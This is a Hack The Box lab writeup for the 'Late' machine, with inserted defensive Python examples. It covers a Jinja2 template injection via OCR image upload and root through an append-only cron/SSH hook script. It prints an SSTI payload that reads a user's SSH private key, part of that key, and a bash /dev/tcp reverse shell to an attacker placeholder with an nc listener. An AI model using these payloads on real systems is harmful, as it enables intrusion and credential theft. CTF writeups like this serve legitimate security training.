HTB Writeups

Late

Personal Rating: Medium

The main exploit for this box was very inconsistent, which is why I rated it medium. The exploit itself was rather common.

Enumeration

The first nmap scan showed these ports open:

sudo nmap -sC -sV <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
<SNIP>

Through fuzzing with ffuf I only found contact.html and index.html, neither of which was very interesting. But index.html referenced a domain: images.late.htb. I added it to my hosts file and found a page with a file upload feature. The site takes an uploaded image and extracts any text out of it (OCR). I first tried uploading a PHP reverse shell disguised as an image, but I couldn't find an LFI to trigger it.

Jinja2 SSTI

Researching the backend, I identified Jinja2 as the template engine. I made an image that contained this test payload:

{{7*7}}

The resulting text was indeed 49, so the OCR output was being rendered as a Jinja2 template rather than being inserted as data. I then searched for Jinja2 SSTI payloads and tried many of them. The main obstacle was that the application was very inconsistent and did not recognise my text reliably. After countless attempts and looking at the fonts and payloads other people had used, this was the one that worked in the end:

${{request.application.__globals__.__builtins__.__import__("os").popen("cat /home/svc_acc/.ssh/id_rsa").read()}}

This payload itself took multiple attempts and did not work with a bash reverse shell and similar variants, so I was lucky to be able to retrieve the private SSH key this way. This was the uploaded image:
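The root cause behind the `{{7*7}}` test, as an added example that is not the box's code: a Jinja2 page that splices the OCR output into the template source, next to the fixed version that passes it as a template variable. It assumes the jinja2 package is installed; RESULT_PAGE is a constructed stand-in for the real result page.

```python
"""Why OCR output must reach the template as data, never as template source."""
from jinja2 import Environment  # third-party dependency: pip install jinja2

# Constructed stand-in for the image tool's result page (assumption, not the box's real source).
RESULT_PAGE = "<p>Extracted text:</p><pre>{{ text }}</pre>"

# autoescape=True also applies to from_string(), so HTML in the data is escaped.
env = Environment(autoescape=True)


def render_vulnerable(ocr_text: str) -> str:
    """The bug pattern: user-controlled text is concatenated INTO the template
    source, so Jinja2 parses and evaluates any {{ }} or {% %} it contains."""
    template_source = RESULT_PAGE.replace("{{ text }}", ocr_text)
    return env.from_string(template_source).render()


def render_safe(ocr_text: str) -> str:
    """The fix: the template is a constant and the OCR output is a variable.
    Braces inside the data are plain characters, never template syntax."""
    return env.from_string(RESULT_PAGE).render(text=ocr_text)


def evaluates_probe(render, probe: str = "{{7*7}}", expected: str = "49") -> bool:
    """Regression check: does this renderer evaluate the arithmetic probe from the writeup?"""
    output = render(probe)
    return expected in output and probe not in output


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        print(f"{name:10} -> {fn('{{7*7}}')}   evaluates probe: {evaluates_probe(fn)}")
```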

Persistence

The takeaway here is that if the exploit is inconsistent, you might have to go for the right persistence method, instead of trying to get a direct shell no matter what.

The user was svc_acc.

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
<SNIP>
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

I transferred LinEnum, linuxprivchecker and pspy onto the machine. LinEnum and linuxprivchecker didn't return much of interest, but pspy did.

A cronjob appeared to create the file /usr/local/sbin/ssh-alter.sh.

Reading the file, I saw that it is executed whenever someone starts or ends an SSH connection to the machine.

Cronjob & Append Attribute

I could not edit it with user permissions; however, lsattr on the file showed me that it has the append-only attribute set, so I can append to it even though I cannot overwrite it. So I appended a bash reverse shell back to my host and ended the existing SSH connection. The script was executed as expected and I caught the reverse shell, which ran as root.

nc -lnvp 4444 #On my attacker machine
echo 'bash -i >& /dev/tcp/<ATTACKERIP>/4444 0>&1' >> /usr/local/sbin/ssh-alter.sh
exit
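The lesson from this privilege escalation, as an added audit check that is my own and not part of the box or the writeup: a script that root executes is only as trustworthy as the least privileged user who may write to it, and chattr +a restricts how such a user writes (append instead of overwrite), not whether they can. The pure function works on stat fields and the lsattr flag column with constructed inputs; the live wrapper assumes Linux with e2fsprogs lsattr available.

```python
"""Audit a script that root executes (cron job, sshd/PAM hook): can a non-root user change what runs?"""
import os
import stat
import subprocess
import sys


def audit_root_script(mode: int, uid: int, gid: int, attrs: str) -> list:
    """Pure check on stat(2) fields plus the lsattr flag column; returns findings (empty = fine).
    Ownership and mode bits decide WHO may open the file for writing; the append-only
    attribute only decides HOW they write, so it is not a protection on its own."""
    findings = []
    if uid != 0:
        findings.append(f"owned by uid {uid}, not root: the owner controls code root executes")
    if mode & stat.S_IWGRP and gid != 0:
        findings.append(f"group-writable (gid {gid})")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if "a" in attrs and findings:
        findings.append("append-only attribute still lets those users append commands")
    return findings


def lsattr_flags(path: str) -> str:
    """Attribute column of `lsattr <path>` (e2fsprogs); empty string if unavailable."""
    try:
        out = subprocess.run(["lsattr", path], capture_output=True, text=True, check=True).stdout
        return out.split()[0]
    except (OSError, subprocess.CalledProcessError, IndexError):
        return ""


def audit_path(path: str) -> list:
    """Live wrapper: gather owner, mode and attributes for one file and audit them."""
    st = os.stat(path)
    return audit_root_script(st.st_mode, st.st_uid, st.st_gid, lsattr_flags(path))


if __name__ == "__main__":
    # Default target is the hook from the writeup; pass other root-executed scripts as arguments.
    for path in sys.argv[1:] or ["/usr/local/sbin/ssh-alter.sh"]:
        try:
            findings = audit_path(path)
        except OSError as exc:
            print(f"{path}: {exc}")
            continue
        print(f"{path}: " + ("; ".join(findings) if findings else "root-owned, not writable by others"))
```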

Last updated 1 year ago

Sources:

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/